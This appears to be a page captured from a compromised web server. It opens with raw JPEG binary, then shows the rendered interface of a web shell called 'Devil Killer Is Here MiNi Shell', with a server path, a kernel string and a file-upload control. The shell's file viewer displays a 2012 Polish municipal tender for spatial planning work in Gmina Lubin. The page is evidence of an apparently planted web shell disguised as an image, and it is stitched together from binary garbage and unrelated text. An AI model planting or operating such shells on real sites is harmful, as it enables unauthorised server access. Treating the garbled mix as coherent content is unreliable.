JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120709/148659-N-2012.html

<p class="kh_header"><b>Lubin: OPRACOWANIE ZMIANY STUDIUM UWARUNKOWAŃ I KIERUNKÓW ZAGOSPODAROWANIA PRZESTRZENNEGO GMINY LUBIN, 
OPRACOWANIE ZMIANY MIEJSCOWEGO PLANU ZAGOSPODAROWANIA PRZESTRZENNEGO GMINY LUBIN ORAZ WYKONANIE OPRACOWANIA EKOFIZJOGRAFICZNEGO OBEJMUJĄCEGO CAŁY TEREN GMINY LUBIN</b><br>
<b>Numer ogłoszenia: 148659 - 2012; data zamieszczenia: 09.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubin , ul. Władysława Łokietka 6, 59-300 Lubin, woj. dolnośląskie, tel. (76) 8403100, faks (76) 8403140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ug-lubin.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE ZMIANY STUDIUM UWARUNKOWAŃ I KIERUNKÓW ZAGOSPODAROWANIA PRZESTRZENNEGO GMINY LUBIN, 
OPRACOWANIE ZMIANY MIEJSCOWEGO PLANU ZAGOSPODAROWANIA PRZESTRZENNEGO GMINY LUBIN ORAZ WYKONANIE OPRACOWANIA EKOFIZJOGRAFICZNEGO OBEJMUJĄCEGO CAŁY TEREN GMINY LUBIN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu jest opracowanie zmian studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin obejmujący obszar przedstawiony na załącznikach graficznych uchwał Rady Gminy Lubin nr XX/154/2011, nr XX/155/2011, nr XX/157/2011 Rady Gminy Lubin z dnia               14 grudnia 2011 r. w sprawie przystąpienia do opracowania zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin oraz uchwałami: nr XXV/193/2012, XXV/194/2012, nr XXV/195/2012 Rady Gminy Lubin z dnia 31 maja 2012 r. w sprawie zmiany uchwał jw. (zmiana załączników graficznych) - dotyczy lokalizacji farm wiatrowych; uchwałą nr XXIV/185/2012 Rady Gminy Lubin z dnia 28 marca 2012 r. w sprawie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin (obręb Chróstnik teren aktywności gospodarczej usługowo - produkcyjnej z możliwością instalacji ogniw fotowoltaicznych wraz z niezbędnymi urządzeniami infrastruktury technicznej); uchwałą nr XXV/196/2012 Rady Gminy Lubin z dnia                   31 maja 2012 r. w sprawie przystąpienia do zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin (obręb Szklary Górne - rekultywacja terenu kopalni piasku posadzkowego Obora) oraz zmian miejscowego planu zagospodarowania przestrzennego gminy Lubin obejmujący obszar  przedstawiony na załącznikach graficznych uchwał Rady Gminy Lubin  od nr XX/125/2011 do nr XX/153/2011 z dnia 14 grudnia 2011 r. w sprawie przystąpienia  do sporządzenia zmian miejscowego planu zagospodarowania przestrzennego gminy  Lubin, przepisami ustawy  z dnia 27 marca 2003 r. o planowaniu i  zagospodarowaniu przestrzennym ( Dz. U. Nr 80, poz. 717 z późn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium  uwarunkowań i kierunków zagospodarowania przestrzennego  (Dz. U. Nr 118, poz. 1233),  rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie  wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587), ustawą z dnia 3 października 2008 r. o  udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w  ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.) oraz innymi obowiązującymi przepisami. 

Przedmiotem zamówienia jest:
A) opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin: 1) część terenu położonego w obrębach Obora i Krzeczyn Mały; 2) część terenu położonego w obrębach Chróstnik, Osiek i Pieszków; 3) część terenu położonego w obrębie Niemstów, 4) część terenu położonego w obrębie Szklary Górne, 5) część terenu położonego w obrębie Chróstnik;
B) opracowanie zmiany miejscowego planu zagospodarowania przestrzennego gminy Lubin  obręb:               1) Bukowna, 2) Chróstnik, 3) Czerniec, 4) Dąbrowa Górna, 5) Gogołowice, 6) Gorzelin, 7) Gola,                8) Gorzyca, 9) Karczowiska, 10) Kłopotów, 11) Krzeczyn Mały, 12) Krzeczyn Wielki, 13) Księginice, 14) Lisiec, 15) Miłoradzice, 16) Miłosna, 17) Niemstów, 18) Obora, 19) Osiek, 20) Pieszków,                     21) Raszowa, 22) Raszowa Mała, 23) Raszówka, 24) Siedlce, 25) Składowice, 26) Szklary Górne,              27) Ustronie, 28) Wiercień, 29) Zimna Woda;
C) wykonanie opracowania ekofizjograficznego (podstawowego) obejmującego cały teren gminy Lubin.

Szczegółowy opis przedmiotu zamówienia obejmuje:
A) opracowanie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin:
1) część terenu położonego w obrębie Obora i Krzeczyn Mały z przeznaczeniem pod lokalizację farm wiatrowych (obiektów infrastruktury elektroenergetycznej, komunikacyjnej i przesyłowej) o pow. około 495 ha; 
2) część terenu położonego w obrębie Chróstnik, Osiek i Pieszków z przeznaczeniem pod lokalizację farm wiatrowych (obiektów infrastruktury elektroenergetycznej, komunikacyjnej i przesyłowej) o pow. około 395 ha; 
3) część terenu położonego w obrębie Niemstów z przeznaczeniem pod lokalizację farm wiatrowych (obiektów infrastruktury elektroenergetycznej, komunikacyjnej i przesyłowej) o pow. około 295 ha;
4) część terenu położonego w obrębie Szklary Górne z przeznaczeniem na rekultywację terenu kopalni piasku posadzkowego Obora w kierunku usług: rekreacyjno - sportowo - rehabilitacyjno - leczniczych (infrastruktura techniczna,  połączenia komunikacyjne) o pow. około 400 ha;
5) część terenu położonego w obrębie Chróstnik z przeznaczeniem pod teren działalności gospodarczej usługowo - produkcyjnej z możliwością instalacji ogniw fotowoltaicznych wraz z niezbędnymi urządzeniami infrastruktury technicznej o pow. około 12 ha.
- zgodnie z: ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym ( Dz. U. Nr 80, poz. 717 z późn. zm. ), ustawą z dnia  3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego (Dz. U. Nr 118, poz. 1233) oraz innymi obowiązującymi przepisami i uchwałami: nr XX/154/2011, nr XX/155/2011, nr XX/157/2011 Rady Gminy Lubin z dnia 14 grudnia 2011 r. w sprawie przystąpienia do opracowania zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin oraz uchwałami: nr XXV/193/2012, XXV/194/2012, nr XXV/195/2012 Rady Gminy Lubin z dnia 31 maja 2012 r. w sprawie zmiany uchwał jw. (zmiana załączników graficznych) - dotyczy lokalizacji farm wiatrowych; uchwałą nr XXIV/185/2012 Rady Gminy Lubin z dnia 28 marca 2012 r. w sprawie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin (obręb Chróstnik teren aktywności gospodarczej usługowo - produkcyjnej z możliwością instalacji ogniw fotowoltaicznych wraz z niezbędnymi urządzeniami infrastruktury technicznej); uchwałą nr XXV/196/2012 Rady Gminy Lubin z dnia 31 maja 2012 r. w sprawie przystąpienia do zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin (obręb Szklary Górne - rekultywacja terenu kopalni piasku posadzkowego Obora).
Gmina posiada Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin uchwalone uchwałą nr XLVI/236/2010 Rady Gminy Lubin z dnia 16 marca 2010 r.

B) opracowanie zmiany miejscowego planu zagospodarowania przestrzennego gminy Lubin następujących obrębów: 1) Bukowna o pow. około 443 ha; 2) Chróstnik o pow. około 1886 ha;                 3) Czerniec o pow. około 844 ha; 4) Dąbrowa Górna o pow. około 412 ha; 5) Gogołowice o pow. około 914 ha; 6) Gorzelin o powierzchni około 452 ha; 7) Gola o pow. około 636 ha; 8) Gorzyca o pow. około  1208 ha; 9) Karczowiska o pow. około 956 ha; 10) Kłopotów o pow. około 499 ha;                            11) Krzeczyn Mały o pow. około 624 ha; 12) Krzeczyn Wielki o pow. około 667 ha; 13) Księginice o pow. około 897 ha; 14) Lisiec o pow. około 1003 ha; 15) Miłoradzice o pow. około 1071 ha;                        16) Miłosna o pow. około 210 ha; 17) Niemstów o pow. około 2169 ha;  18) Obora o pow. około 1103 ha; 19) Osiek o pow. około 707 ha; 20) Pieszków o pow. około 922 ha; 21) Raszowa o pow. około 587 ha;  22) Raszowa Mała o pow. około 403 ha; 23) Raszówka o pow. około 1091 ha; 24) Siedlce o pow. około 1018 ha; 25) Składowice o pow. około 858 ha; 26) Szklary Górne o pow. około 3069 ha;                  27) Ustronie o pow. około 643 ha; 28) Wiercień o pow. około 911 ha; 29) Zimna Woda o pow. około 1953 ha, część gminy leży w zasięgu terenów górniczych kopalni rud miedzi ,
- zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym ( Dz. U. Nr 80, poz. 717 z późn. zm. ), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587), ustawą z dnia  3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.) oraz innymi obowiązującymi przepisami i uchwałami od nr XX/125/2011 do nr XX/153/2011 Rady Gminy Lubin z dnia 14 grudnia 2011 r. w sprawie przystąpienia do sporządzenia zmian miejscowego planu zagospodarowania przestrzennego gminy Lubin obręby: Bukowna, Chróstnik,  Czerniec, Dąbrowa Górna, Gogołowice, Gorzelin, Gola, Gorzyca,  Karczowiska, Kłopotów, Krzeczyn Mały, Krzeczyn Wielki, Księginice, Lisiec,  Miłoradzice, Miłosna,  Niemstów, Obora, Osiek,  Pieszków, Raszowa,  Raszowa Mała, Raszówka, Siedlce, Składowice, Szklary Górne, Ustronie, Wiercień i Zimna Woda.

C) wykonanie opracowania ekofizjograficznego (podstawowego) obejmującego cały  teren gminy Lubin zgodnie z rozporządzeniem Ministra Środowiska  z dnia 09 września 2002 r. w sprawie opracowań ekofizjograficznych (Dz. U. Nr 155, poz. 1298).

Gmina Lubin posiada miejscowy plan zagospodarowania przestrzennego gminy Lubin uchwalony uchwałą nr XLVI/489/2002 Rady Gminy Lubin z dnia 9 października 2002 r., opublikowany w Dzienniku Urzędowym Województwa Dolnośląskiego Nr 250, poz. 3505 z dnia 10 grudnia 2002 r. (obejmujący cały teren administracyjny gminy Lubin); oraz zmianami uchwalonymi:
- Uchwałą nr XXXVII/164/2006 Rady Gminy Lubin z dnia 07 marca 2006 r., ogłoszoną w Dzienniku Urzędowym Województwa Dolnośląskiego Nr 89, poz. 1535 z dnia  05 maja 2006 r. (Obora);
- Uchwałą nr VI/33/2007 Rady Gminy Lubin z dnia 30 marca 2007,  ogłoszoną w Dzienniku Urzędowym Województwa Dolnośląskiego Nr 144, poz. 1862 z dnia 14 czerwca 2007 r. (Chróstnik);
-  Uchwałą nr XLVIII/201/2006 Rady Gminy Lubin  z dnia 20 października 2006 roku, ogłoszoną            w Dzienniku Urzędowy Województwa Dolnośląskiego Nr 12, poz. 110 z dnia 17 stycznia 2007 r. (zalesienie);
- Uchwałą  nr XXIV/129/2008 Rady Gminy Lubin z dnia 09 października 2008 r., ogłoszoną w Dzienniku Urzędowym Województwa Dolnośląskiego Nr 311, poz. 3737 z dnia 02 grudnia 2008 r. (Chróstnik, przy drodze krajowej);
-  Uchwałą nr XIX/120/2011 Rady Gminy Lubin z dnia 30 listopada 2011 r., ogłoszoną w Dzienniku Urzędowym Województwa Dolnośląskiego z dnia 13 marca 2012 r. poz. 104  (schronisko dla zwierząt Szklary Górne).

Zmiana przedmiotu umowy może nastąpić w zakresie dotyczącym realizacji inwestycji i nie będzie miała wpływu na zakres opracowania oraz termin realizacji zadania. 

W skład opracowania wchodzi: 
A) w zakresie zmiany studium :
- część opisowa (tekst) studium, składająca się z uwarunkowań zagospodarowania przestrzennego i kierunków zagospodarowania przestrzennego i część graficzna składająca się z dwóch rysunków (uwarunkowania i kierunki zagospodarowania przestrzennego całej gminy) w skali 1:20000 oraz w skali 1:10000 (opracowane zmiany studium) sporządzonych na kopii mapy topograficznej, pochodzącej z państwowego zasobu geodezyjnego i kartograficznego lub na kopii wojskowej mapy topograficznej  oraz rozstrzygnięcie o sposobie rozpatrzenia uwag.
B) w  zakresie  zmiany miejscowego planu:
- tekst  planu, który stanowi treść uchwały, część graficzna sporządzona w skali 1:1000 na kopii map zasadniczych albo w przypadku ich braku na kopii map katastralnych, które pochodzą z państwowego zasobu geodezyjno - kartograficznego oraz wymagane przepisami rozstrzygnięcia planistyczne, które będą stanowiły  załączniki (w tym: prognozę skutków finansowych oraz prognozę oddziaływania na środowisko).
C) w zakresie opracowania ekofizjograficznego:
- część kartograficzna (graficzna) sporządzona na mapie, poświadczonej za zgodność z oryginałem przechowywanym w państwowym zasobie geodezyjnym i kartograficznym, w skali odpowiadającej przedmiotowi i szczegółowości opracowania ekofizjograficznego i część opisowa.

Dokumentację planistyczną sporządzoną na poszczególnych etapach opracowania, należy przedłożyć          Zamawiającemu w ilościach odpowiednich dla przeprowadzenia kolejnych działań  proceduralnych.

Do uchwalenia przez Radę Gminy Lubin, projekt zmian studium uwarunkowań i kierunków zagospodarowania przestrzennego dla każdej zmiany, należy złożyć oddzielnie, w ilości  po 3 egzemplarze.
Do uchwalenia przez Radę Gminy Lubin, projekt zmian miejscowego planu zagospodarowania przestrzennego, należy złożyć oddzielnie dla każdego obrębu, w ilości  po 3 egzemplarze.

Zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego wraz z załącznikami oraz zmiany miejscowego planu zagospodarowania przestrzennego wraz z załącznikami należy przygotować w LAPX Edytorze Aktów Prawnych XML wersja: APX Standard Network  w zapisie elektronicznym przekazanym na płycie CD, którą należy dostarczyć do tutejszego Urzędu przed podjęciem uchwał  przez Radę Gminy w Lubinie.


Zamówienie obejmuje wykonanie i dostarczenie Zamawiającemu do jego siedziby, to jest do Urzędu Gminy w Lubinie ul. Łokietka 6 (przed podpisaniem protokołu zdawczo - odbiorczego) przedmiotu zamówienia w następujących formach:

A) Zmiana Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin:
1) Końcową dokumentację zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego należy sporządzić dla każdej zmiany:
a. trzy egzemplarze części opisowej (tekstowej) składającej się z uwarunkowań zagospodarowania przestrzennego i kierunków zagospodarowania przestrzennego w formie książkowej A-4 oraz trzy egzemplarze części graficznej kierunków zagospodarowania przestrzennego w skali 1:10000 obejmującej zmiany;
b. cztery egzemplarze części opisowej (tekstowej) składającej się z uwarunkowań zagospodarowania przestrzennego i kierunków zagospodarowania przestrzennego w formie książkowej A-4 obejmującej wszystkie zmiany studium - część  zbiorowa; 
c. po dwa egzemplarze część graficznej składającej się z dwóch rysunków w skali 1: 20 000 dla całego obszaru gminy z naniesionymi zmianami, przygotowanych w kolorze i zafoliowanych oraz  przygotowanych  do zawieszenia (minimum trzy zawieszki)  np.  na ścianę:
      1. Rysunek nr 1 w skali 1: 20 000 uwarunkowania zagospodarowania przestrzennego,
      2. Rysunek nr 2 w skali 1: 20 000 kierunki zagospodarowania przestrzennego.
d. część tekstowa i graficzna w wersji elektronicznej na płycie CD: 
Część tekstową opracowania należy sporządzić w formie *.doc i *.pdf). 
Część graficzną opracowania należy sporządzić z zachowaniem następujących zasad: 
- Mapy cyfrowe i całe opracowanie należy opracować w układzie odniesienia 1992;
- Wersja rastrowa w formacie *.tif z plikiem nagłówkowym odniesienia *.tfw, w 256 kolorach, kompresja LZW, rozdzielczość minimum 300 dpi, w układzie odniesienia 1992.
Dopuszczalny format *.hmr z zachowaniem powyższych parametrów;
- Wersja wektorowa w formacie * . dgn ( Bentley Microstation V8) wraz z mapami topograficznymi w formacie * .tif  lub * . hmr z binarną głębią kolorów,
- oraz do odczytu plików *.jpg 
2) Dwa egzemplarze studium uwarunkowań i kierunków zagospodarowania przestrzennego dla każdej zmiany oddzielnie (dostarczyć najpóźniej 3 dni po uchwaleniu przez Radę Gminy Lubin) należy przygotować do przekazania do Urzędu Wojewódzkiego we Wrocławiu celem sprawdzenia.
3) Dokumentacja planistyczna: komplet dokumentacji planistycznej dokumentującej tok formalno - prawny (dostarczyć najpóźniej 3 dni po uchwaleniu przez Radę Gminy Lubin), którą należy opracować w jednym  egzemplarzu w oryginale i jeden egzemplarz w kopii.
4) Prognoza oddziaływania na środowisko:
        - dwa egzemplarze prognozy oddziaływania na środowisko w wersji drukowanej i   elektronicznej (2 płyty CD),
 - rysunki, mapy w wersji kolorowej o rozdzielczości min. 300 DPI (do odczytu plików *.jpg i wydruku części tekstowej *.doc i  *.pdf).

B) Zmiana miejscowego planu zagospodarowania przestrzennego gminy Lubin:
1) Końcową dokumentację zmiany miejscowego planu zagospodarowania przestrzennego gminy Lubin  należy sporządzić oddzielnie dla każdego obrębu:
a. cztery egzemplarze części tekstowej i graficznej w formie książkowej A-4 ( w kolorze);
b. trzy egzemplarze części graficznej całych arkuszy przygotowanych w kolorze i zafoliowanych, 
        w tym:
      - jeden egzemplarz graficzny pocięty na formaty A-3 umożliwiający wykonanie odbitki z ksera,
      - jeden egzemplarz oprawiony w listwy, przygotowany do zawieszenia (minimum trzy zawieszki) np.  na ścianę;
c. dwa egzemplarze części tekstowej  przygotowanej w formie książkowej A-4;
d. część tekstowa i graficzna w wersji elektronicznej  na płycie CD:
Część tekstową opracowania należy sporządzić w formie *.doc i *.pdf).
Część graficzną opracowania (załączniki graficzne do uchwał) należy sporządzić z zachowaniem następujących zasad: 
- podkład mapowy w wersji rastrowej w formacie * .tif z plikiem nagłówkowym odniesienia * .tfw o rozdzielczości minimum 300 dpi ,
- wersja wektorowa (załączników graficznych do uchwał) w formacie *  .dgn (Bentley Microstation V8),
- oraz do odczytu plików *.jpg 
2) Jeden  egzemplarz kolorowy planszy rysunku w skali 1: 20 000 zafoliowany, obejmujący wszystkie obręby, egzemplarz poglądowy terenu  gminy Lubin przestawiający tereny przeznaczone pod elementy struktury funkcjonalno - przestrzennej, elementy systemu ochrony środowiska przyrodniczego                 i kulturowego, granice udokumentowanych złóż, tereny i obszary górnicze, elementy układu komunikacji drogowej oraz elementy infrastruktury technicznej, oprawiony w listwy, przygotowany do zawieszenia np. na ścianę.
3) Dwa egzemplarze miejscowego planu zagospodarowania przestrzennego dla każdego obrębu oddzielnie (dostarczyć najpóźniej 3 dni po uchwaleniu przez Radę Gminy Lubin) należy przygotować do przekazania do Urzędu Wojewódzkiego we Wrocławiu celem sprawdzenia i wydrukowania w DUWD.
4) Dokumentacja planistyczna dla każdego obrębu oddzielnie:
a. komplet dokumentacji planistycznej dokumentującej tok formalno - prawny (dostarczyć najpóźniej  3 dni po uchwaleniu przez Radę Gminy Lubin), którą należy opracować w jednym  egzemplarzu w oryginale i jeden egzemplarz w kopii.
5) Prognoza oddziaływania na środowisko  dla każdego obrębu oddzielnie:
   a. dwa egzemplarze prognozy oddziaływania na środowisko w wersji drukowanej i elektronicznej (2 płyty CD),
   b. rysunki, mapy w wersji kolorowej o rozdzielczości min. 300 DPI (do odczytu plików *.jpg i wydruku części tekstowej *.doc i  *.pdf).
6) Prognoza skutków finansowych dla każdego obrębu oddzielnie:
   a. dwa egzemplarze prognozy skutków finansowych w wersji drukowanej i elektronicznej 
        (2 płyty CD),
    b.rysunki, mapy w wersji kolorowej o rozdzielczości min. 300 DPI (do odczytu plików *.jpg i wydruku części tekstowej *.doc i  *.pdf). 

C) Opracowanie ekofizjograficzne (należy sporządzić przed podjęciem prac nad projektem zmian miejscowego planu):
Końcową dokumentację opracowania ekofizjograficznego obejmującego  cały teren gminy Lubin należy przygotować:
1) cztery  egzemplarze części tekstowej i graficznej w formie książkowej A-4 ( w kolorze);
2) dwa egzemplarze części graficznej (kartograficznej) całego terenu gminy Lubin (przygotowanych w kolorze, zafoliowanych, oprawionych w listwy, przygotowanych do zawieszenia, np. na ścianę);
3) część tekstowa i graficzna w wersji elektronicznej na płycie CD:
a) Część tekstową opracowania należy sporządzić w formie *.doc i *.pdf).
b) Część graficzną (kartograficzna) opracowania  należy sporządzić z zachowaniem następujących zasad: 
    - Mapy cyfrowe i całe opracowanie należy opracować w układzie odniesienia 1992;
    - Wersja rastrowa w formacie *.tif z plikiem nagłówkowym odniesienia *.tfw, w 256   kolorach,  kompresja LZW, rozdzielczość minimum 300 dpi, w układzie odniesienia 1992.
Dopuszczalny format *.hmr z zachowaniem powyższych parametrów;
    -Wersja wektorowa w formacie * .dgn ( Bentley Microstation V8) wraz z mapami topograficznymi w formacie * .tif  lub * . hmr z binarną głębią kolorów;
   - oraz do odczytu plików *.jpg. 


W przypadku wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od wykonania  opracowania w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z  tytułu wykonania części umowy.

Uwaga: Harmonogram prac planistycznych wraz z wyceną poszczególnych etapów należy tak opracować, aby całkowita wartość faktur przejściowych nie przekroczyła 70% ceny umownej, który należy przedłożyć przed podpisaniem umowy.
     
Wykonawca przenosi w granicach wynagrodzenia jak w zakresie przedmiotu zamówienia na Zamawiającego majątkowego prawa autorskie do opracowania  będącego  przedmiotem umowy na wszystkich polach eksploatacji  jak w art. 50 ustawy z dnia 4 lutego 1994 r. o prawie autorskim                  i prawach pokrewnych ( Dz. U. z   2006 r. Nr 90, poz. 631 ze zm. ).

Oferta obejmuje udział Wykonawcy w działaniach formalno - prawnych, łącznie z przygotowaniem         i wysłaniem  niezbędnych pism oraz sporządzeniem wszystkich wymaganych właściwymi przepisami dokumentów proceduralnych i planistycznych wraz z uczestnictwem na spotkaniach z Wójtem Gminy Lubin, uczestnictwem w posiedzeniach Komisji Rady Gminy Lubin i na sesjach Rady Gminy Lubin oraz przygotowaniem dokumentacji.
Wszystkie materiały wyjściowe do zmiany studiu uwarunkowań i kierunków zagospodarowania przestrzennego i miejscowego planu zagospodarowania przestrzennego, w tym niezbędne  podkłady mapowe do zmiany w studium uwarunkowań i opracowania ekofizjograficznego, Wykonawca zabezpiecza we własnym zakresie, wliczając ich koszt w ogólną wartość przedmiotu zamówienia.    
Zamawiający dostarczy do zmiany miejscowego planu  mapy w wersji papierowej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

